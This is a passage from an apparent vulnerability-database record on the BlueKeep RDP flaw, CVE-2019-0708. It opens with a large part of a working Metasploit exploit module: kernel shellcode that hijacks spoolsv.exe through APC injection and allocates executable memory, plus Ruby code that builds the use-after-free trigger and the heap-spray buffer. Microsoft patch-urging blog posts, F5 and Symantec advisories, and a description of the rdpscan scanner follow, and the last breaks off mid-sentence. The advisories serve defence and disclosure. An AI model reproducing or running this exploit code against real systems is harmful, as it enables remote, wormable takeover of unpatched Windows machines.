edi, #{psgetprocessimagefilename_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\n\n\n ;======================================\n ; find offset of EPROCESS.ThreadListHead\n ;======================================\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\n\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\n jb _find_eprocess_threadlist_offset_win7\n add eax, 0x10\n_find_eprocess_threadlist_offset_win7:\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\n\n ;======================================\n ; find offset of ETHREAD.ThreadListEntry\n ;======================================\n\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\n mov r9, r8\n\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\n_find_ethread_threadlist_offset_loop:\n mov r9, qword [r9]\n\n cmp r8, r9 ; check end of list\n je _insert_queue_apc_done ; not found !!!\n\n ; if (r9 - r14 < 0x700) found\n mov rax, r9\n sub rax, r14\n cmp rax, 0x700\n ja _find_ethread_threadlist_offset_loop\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\n\n\n ;======================================\n ; find offset of EPROCESS.ActiveProcessLinks\n ;======================================\n mov edi, #{psgetprocessid_hash}\n call get_proc_addr\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\n\n\n ;======================================\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\n ;======================================\n ; check process name\n\n\n xor eax, eax ; HACK to exit earlier if process not found\n\n_find_target_process_loop:\n lea rsi, [rcx+rbx]\n\n push rax\n call calc_hash\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\n pop rax\n jz found_target_process\n\n;---------- HACK PROCESS NOT FOUND start -----------\n inc rax\n cmp rax, 0x300 ; HACK not found!\n jne _next_find_target_process\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n\n jmp _r3_to_r0_done\n\n;---------- HACK PROCESS NOT FOUND end -----------\n\n_next_find_target_process:\n ; next process\n mov rcx, [rcx+rdi]\n sub rcx, rdi\n jmp _find_target_process_loop\n\n\nfound_target_process:\n ; The allocation for userland payload will be in KernelApcRoutine.\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\n\n ;======================================\n ; save process PEB for finding CreateThread address in kernel KAPC routine\n ;======================================\n mov edi, #{psgetprocesspeb_hash}\n ; rcx is EPROCESS. no need to set it.\n call win_api_direct\n mov [rbp+#{data_peb_addr_offset}], rax\n\n\n ;======================================\n ; iterate ThreadList until KeInsertQueueApc() success\n ;======================================\n ; r15 = nt\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\n ; rcx = EPROCESS\n ; edx = offset of EPROCESS.ThreadListHead\n\n\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n mov rbx, rsi ; use rbx for iterating thread\n\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\n ; try queueing APC then check KAPC member is more reliable.\n\n_insert_queue_apc_loop:\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\n mov rbx, [rbx+8]\n\n cmp rsi, rbx\n je _insert_queue_apc_loop ; skip list head\n\n ; find start of ETHREAD address\n ; set it to rdx to be used for KeInitializeApc() argument too\n lea rdx, [rbx + r14] ; ETHREAD\n\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\n ; Teb member is next to Queue member.\n mov edi, #{psgetthreadteb_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\n je _insert_queue_apc_loop\n\n ; KeInitializeApc(PKAPC,\n ; PKTHREAD,\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\n ; PKRUNDOWN_ROUTINE = NULL,\n ; PKNORMAL_ROUTINE = userland_shellcode,\n ; KPROCESSOR_MODE = UserMode (1),\n ; PVOID Context);\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\n xor r8, r8 ; OriginalApcEnvironment\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\n push rbp ; context\n push 1 ; UserMode\n push rbp ; userland shellcode (MUST NOT be NULL)\n push r8 ; NULL\n sub rsp, 0x20 ; shadow stack\n mov edi, #{keinitializeapc_hash}\n call win_api_direct\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\n\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\n ; SystemArgument1 is second argument in usermode code (rdx)\n ; SystemArgument2 is third argument in usermode code (r8)\n lea rcx, [rbp+#{data_kapc_offset}]\n ;xor edx, edx ; no need to set it here\n ;xor r8, r8 ; no need to set it here\n xor r9, r9\n mov edi, #{keinsertqueueapc_hash}\n call win_api_direct\n add rsp, 0x40\n ; if insertion failed, try next thread\n test eax, eax\n jz _insert_queue_apc_loop\n\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\n ; EPROCESS pointer 8 bytes\n ; InProgressFlags 1 byte\n ; KernelApcPending 1 byte\n ; if success, UserApcPending MUST be 1\n cmp byte [rax+0x1a], 1\n je _insert_queue_apc_done\n\n ; manual remove list without lock\n mov [rax], rax\n mov [rax+8], rax\n jmp _insert_queue_apc_loop\n\n_insert_queue_apc_done:\n ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\n\n_r3_to_r0_done:\n pop rax\n pop rbx\n pop rsi\n pop rdi\n pop r14\n pop r15\n ret\n\n;========================================================================\n; Call function in specific module\n;\n; All function arguments are passed as calling normal function with extra register arguments\n; Extra Arguments: r15 = module pointer\n; edi = hash of target function name\n;========================================================================\nwin_api_direct:\n call get_proc_addr\n jmp rax\n\n\n;========================================================================\n; Get function address in specific module\n;\n; Arguments: r15 = module pointer\n; edi = hash of target function name\n; Return: eax = offset\n;========================================================================\nget_proc_addr:\n ; Save registers\n push rbx\n push rcx\n push rsi ; for using calc_hash\n\n ; use rax to find EAT\n mov eax, dword [r15+60] ; Get PE header e_lfanew\n mov eax, dword [r15+rax+136] ; Get export tables RVA\n\n add rax, r15\n push rax ; save EAT\n\n mov ecx, dword [rax+24] ; NumberOfFunctions\n mov ebx, dword [rax+32] ; FunctionNames\n add rbx, r15\n\n_get_proc_addr_get_next_func:\n ; When we reach the start of the EAT (we search backwards), we hang or crash\n dec ecx ; decrement NumberOfFunctions\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\n add rsi, r15 ; Add the modules base address\n\n call calc_hash\n\n cmp eax, edi ; Compare the hashes\n jnz _get_proc_addr_get_next_func ; try the next function\n\n_get_proc_addr_finish:\n pop rax ; restore EAT\n mov ebx, dword [rax+36]\n add rbx, r15 ; ordinate table virtual address\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\n mov ebx, dword [rax+28] ; Get the function addresses table rva\n add rbx, r15 ; Add the modules base address\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\n add rax, r15 ; Add the modules base address to get the functions actual VA\n\n pop rsi\n pop rcx\n pop rbx\n ret\n\n;========================================================================\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\n;\n; Argument: rsi = string to hash\n; Clobber: rsi\n; Return: eax = hash\n;========================================================================\ncalc_hash:\n push rdx\n xor eax, eax\n cdq\n_calc_hash_loop:\n lodsb ; Read in the next byte of the ASCII string\n ror edx, 13 ; Rotate right our hash value\n add edx, eax ; Add the next byte of the string\n test eax, eax ; Stop when found NULL\n jne _calc_hash_loop\n xchg edx, eax\n pop rdx\n ret\n\n\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\n; Moreover, there is no lock when calling KernelApcRoutine.\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\n;\n; VOID KernelApcRoutine(\n; IN PKAPC Apc,\n; IN PKNORMAL_ROUTINE *NormalRoutine,\n; IN PVOID *NormalContext,\n; IN PVOID *SystemArgument1,\n; IN PVOID *SystemArgument2)\nkernel_kapc_routine:\n push rbp\n push rbx\n push rdi\n push rsi\n push r15\n\n mov rbp, [r8] ; *NormalContext is our data area pointer\n\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\n push rdx\n pop rsi ; mov rsi, rdx\n mov rbx, r9\n\n ;======================================\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\n ;======================================\n xor eax, eax\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\n ; rdx is already address of baseAddr\n mov [rdx], rax ; baseAddr = 0\n mov ecx, eax\n not rcx ; ProcessHandle = -1\n mov r8, rax ; ZeroBits\n mov al, 0x40 ; eax = 0x40\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\n push rax ; MEM_COMMIT = 0x1000\n ; reuse r9 for address of RegionSize\n mov [r9], rax ; RegionSize = 0x1000\n sub rsp, 0x20 ; shadow stack\n mov edi, #{zwallocatevirtualmemory_hash}\n call win_api_direct\n add rsp, 0x30\n\n ; check error\n test eax, eax\n jnz _kernel_kapc_routine_exit\n\n ;======================================\n ; copy userland payload\n ;======================================\n mov rdi, [rsi]\n\n;--------------------------- HACK IN EGG USER ---------\n\n push rdi\n\n lea rsi, [rel shellcode_start]\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\n\n _find_user_egg_loop:\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _find_user_egg_loop\n\n _inner_find_user_egg_loop:\n inc rsi\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _inner_find_user_egg_loop\n\n pop rdi\n;--------------------------- END HACK EGG USER ------------\n\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\n\n rep movsb\n\n ;======================================\n ; find CreateThread address (in kernel32.dll)\n ;======================================\n mov rax, [rbp+#{data_peb_addr_offset}]\n mov rax, [rax + 0x18] ; PEB->Ldr\n mov rax, [rax + 0x20] ; InMemoryOrder list\n\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n ;mov rbx, rsi ; use rbx for iterating thread\n_find_kernel32_dll_loop:\n mov rax, [rax] ; first one always be executable\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\n ; offset 0x50 => is name\n ; offset 0x20 => is dllbase\n ;cmp word [rax+0x38], 0x40\n ;jne _find_kernel32_dll_loop\n cmp word [rax+0x48], 0x18\n jne _find_kernel32_dll_loop\n\n mov rdx, [rax+0x50]\n ; check only \"32\" because name might be lowercase or uppercase\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\n jnz _find_kernel32_dll_loop\n\n mov r15, [rax+0x20]\n mov edi, #{createthread_hash}\n call get_proc_addr\n\n ; save CreateThread address to SystemArgument1\n mov [rbx], rax\n\n_kernel_kapc_routine_exit:\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n ; restore IRQL to APC_LEVEL\n mov cl, 1\n mov cr8, rcx\n\n pop r15\n pop rsi\n pop rdi\n pop rbx\n pop rbp\n ret\n\nuserland_start_thread:\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\n xor ecx, ecx ; lpThreadAttributes = NULL\n push rcx ; lpThreadId = NULL\n push rcx ; dwCreationFlags = 0\n mov r9, rcx ; lpParameter = NULL\n lea r8, [rel userland_payload] ; lpStartAddr\n mov edx, ecx ; dwStackSize = 0\n sub rsp, 0x20\n call rax\n add rsp, 0x30\n ret\n\nuserland_payload:\n ^\n\n [\n KERNELMODE_EGG,\n assemble_with_fixups(asm)\n ].pack('<Qa*')\n end\n\n def create_free_trigger(chan_user_id, chan_id)\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\n # The extra bytes on the end of the body is what causes the bad things to happen\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\n end\n\n def create_exploit_channel_buffer(target_addr)\n overspray_addr = target_addr + 0x2000\n shellcode_vtbl = target_addr + HEADER_SIZE\n magic_value1 = overspray_addr + 0x810\n magic_value2 = overspray_addr + 0x48\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\n\n # first 0x38 bytes are used by DATA PDU packet\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\n [\n [\n # SystemResourceList (2 pointers, each 8 bytes)\n # Pointer to OWNER_ENTRY (8 bytes)\n # ActiveCount (SHORT, 2 bytes)\n # Flag (WORD, 2 bytes)\n # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\n magic_value2, # --------------------\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\n 0x0, # ActiveCount (SHORT, 2 bytes)\n 0x0, # Flag (WORD, 2 bytes)\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n 0x1F, # ClassOffset (DWORD, 4 bytes)\n 0x0, # bindStatus (DWORD, 4 bytes)\n 0x72, # lockCount1 (QWORD, 8 bytes)\n magic_value3, # connection (QWORD, 8 bytes)\n shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)\n 0x5, # channelClass (DWORD, 4 bytes)\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\n 0x1F, # channelIndex (DWORD, 4 bytes)\n magic_value1, # channels (QWORD, 8 bytes)\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\n magic_value1, # connResrouce (QWORD, 8 bytes)\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\n 0x7065656b, # dword15C (DWORD, 4 bytes)\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\n ].join('')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb"}], "msrc": [{"lastseen": "2019-05-29T14:32:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "Today Microsoft released fixes for a critical Remote Code Execution vulnerability, [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>), in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is \u2018wormable\u2019, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the _WannaCry_ malware spread across the globe in 2017. While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware. \n\nNow that I have your attention, it is important that affected systems are patched as quickly as possible to prevent such a scenario from happening. In response, we are taking the unusual step of providing a security update for all customers to protect Windows platforms, including some out-of-support versions of Windows. \n\nVulnerable in-support systems include Windows 7, Windows Server 2008 R2, and Windows Server 2008. Downloads for in-support versions of Windows can be found in the [Microsoft Security Update Guide](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>). Customers who use an in-support version of Windows and have automatic updates enabled are automatically protected. \n\nOut-of-support systems include Windows 2003 and Windows XP. If you are on an out-of-support version, the best way to address this vulnerability is to upgrade to the latest version of Windows. Even so, we are making fixes available for these out-of-support versions of Windows in [KB4500705](<https://support.microsoft.com/help/4500705>). \n\nCustomers running Windows 8 and Windows 10 are not affected by this vulnerability, and it is no coincidence that later versions of Windows are unaffected. Microsoft invests heavily in strengthening the security of its products, often through major architectural improvements that are not possible to backport to earlier versions of Windows. \n\nThere is partial mitigation on affected systems that have [Network Level Authentication (NLA)](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713\\(v=ws.11\\)>) enabled. The affected systems are mitigated against \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. \n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NLA is enabled or not \u2013 should be updated as soon as possible. \n\n**Resources** \n[Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)[Links to downloads for Windows 2003 and Windows XP](<https://support.microsoft.com/help/4500705>)_ _\n\n_Simon Pope__, __Director of Incident Response__, __Microsoft Security Response Center (MSRC_)", "modified": "2019-05-14T17:05:03", "published": "2019-05-14T17:05:03", "id": "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "href": "https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/", "type": "msrc", "title": "Prevent a worm by updating Remote Desktop Services (CVE-2019-0708)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-09T03:34:06", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "On May 14, Microsoft released fixes for a critical Remote Code Execution vulnerability, [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>), in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 that affects some older versions of Windows. In our [previous blog post](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) on this topic we warned that the vulnerability is \u2018wormable\u2019, and that future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.\n\nMicrosoft is confident that an exploit exists for this vulnerability, and if [recent reports](<https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html>) are accurate, _nearly one million computers connected directly to the internet are __still __vulnerable to CVE-2019-0708_. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise. This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\n\nIt's been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we\u2019re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.\n\n**Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.**\n\nIt is possible that we won\u2019t see this vulnerability incorporated into malware.\n\nBut that\u2019s not the way to bet.\n\n \n\n**EternalBlue Timeline**\n\nAlmost two months passed between the release of fixes for the EternalBlue vulnerability and when ransomware attacks began. Despite having nearly 60 days to patch their systems, many customers had not.\n\nA significant number of these customers were infected by the ransomware.\n\n**March 14, 2017: **Microsoft releases[ security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) which includes fixes for a set of SMBv1 vulnerabilities.\n\n**April 14 2017: **[ShadowBrokers publicly releases a set of exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>), including a wormable exploit known as 'EternalBlue' that leverage these SMBv1 vulnerabilities.\n\n**May 12, 2017: **[The EternalBlue exploit is used in ransomware attacks known as WannaCry](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>). Hundreds of thousands of vulnerable computers across the globe are infected.\n\n \n\n**Resources** \n[Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)[Links to downloads for Windows Vista, Windows 2003 and Windows XP](<https://support.microsoft.com/help/4500705>)_ _\n\n_Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC_)", "modified": "2019-05-31T05:53:28", "published": "2019-05-31T05:53:28", "id": "MSRC:4D3D99779455BE99499289F3B3A35F84", "href": "https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/", "type": "msrc", "title": "A Reminder to Update Your Systems to Prevent a Worm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2020-04-06T22:40:29", "bulletinFamily": "software", "cvelist": ["CVE-2019-0708"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-06-03T22:04:00", "published": "2019-05-16T06:43:00", "id": "F5:K25238311", "href": "https://support.f5.com/csp/article/K25238311", "title": "Microsoft Remote Desktop Services Remote Code Execution vulnerability CVE-2019-0708", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2019-05-15T01:19:50", "bulletinFamily": "software", "cvelist": ["CVE-2019-0708"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows Server 2003 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows XP \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-05-14T00:00:00", "published": "2019-05-14T00:00:00", "id": "SMNTC-108273", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/108273", "type": "symantec", "title": "Microsoft Windows Remote Desktop Services CVE-2019-0708 Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2020-12-01T07:27:43", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379", "CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-AXPv9x_hlIY/XQnJG2GfqKI/AAAAAAAAPWs/DOe7OHqDWd4ph2U3_ECeWZJGFJ8ZrEQXQCLcBGAs/s1600/rdpscan.jpg>)\n\n \n\n\nThis is a quick-and-dirty scanner for the CVE-2019-0708 [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) in [ Microsoft ](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Remote Desktop. Right now, there are about 900,000 machines on the public Internet [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to this vulnerability, so many are to expect a worm soon like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems. \n\nThis is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above. \n\nThis tool is based entirely on the ` rdesktop ` patch from [ https://github.com/zerosum0x0/CVE-2019-0708 ](<https://github.com/zerosum0x0/CVE-2019-0708> \"https://github.com/zerosum0x0/CVE-2019-0708\" ) . \n\n \n** Primary use ** \nTo scan a network, run it like the following: \n\n \n \n rdpscan 192.168.1.1-192.168.1.255\n\nThis produces one of 3 results for each address: \n\n\n * SAFE - if target has determined bot be _ patched _ or at least require _ CredSSP/NLA _\n * VULNERABLE - if the target has been confirmed to be vulnerable \n * UNKNOWN - if the target doesn't respond or has some protocol failure \nWhen nothing exists at a target IP address, the older versions pritned the message \" _ UNKNOWN - connection timed out _ \". When scanning large networks, this produces an overload of too much information about systems you don't care about. Therefore, the new version by default doesn't produce this information unless you add _ -v _ (for verbose) on the command-line. \nYou can increase the speed at which it scans large networks by increasing the number of workers: \n\n \n \n rdpscan --workers 10000 10.0.0.0/8\n\nHowever, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter. \nYou can increase the speed even more by using this in conjunction with ` masscan ` , described in the second below. \n \n** Interpreting the results ** \nThere are three general responses: \n\n\n * _ SAFE _ \\- which means the target is probably patched or otherwise not vulnerable to the bug. \n * _ VULNERABLE _ : which means we've confirmed the target is vulnerable to this bug, and that when the worm hits, will likely get infected. \n * _ UNKNOWN _ : means we can't confirm either way, usually because the target doesn't respond or isn't running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we'll get a lot of these. Finally, protocol errors are responsble for a lot. While the three main responses are _ SAFE _ , _ VULNERABLE _ , and _ UNKNOWN _ , they contain additional text explaining the diagnosis. This section describes the various strings you'll see. \n \n** SAFE ** \nThere are three main reaons we think a target is safe: \n\n\n * _ SAFE - Target appears patched _ This happens when the target doesn't respond to the triggering request. This means it's a Windows system that's been patched, or a system that wasn't vulnerable to begin with, like Windows 10 or Unix. \n * _ SAFE - CredSSP/NLA required _ This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without leigitimate credentials, so cannot determine whether the target has been patched. However, hackers can't continue past this point to exploit vulnerable systems, either, so you are likely \"safe\". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it's un-patched. \n * _ SAFE - not RDP _ This means the system is not RDP, but 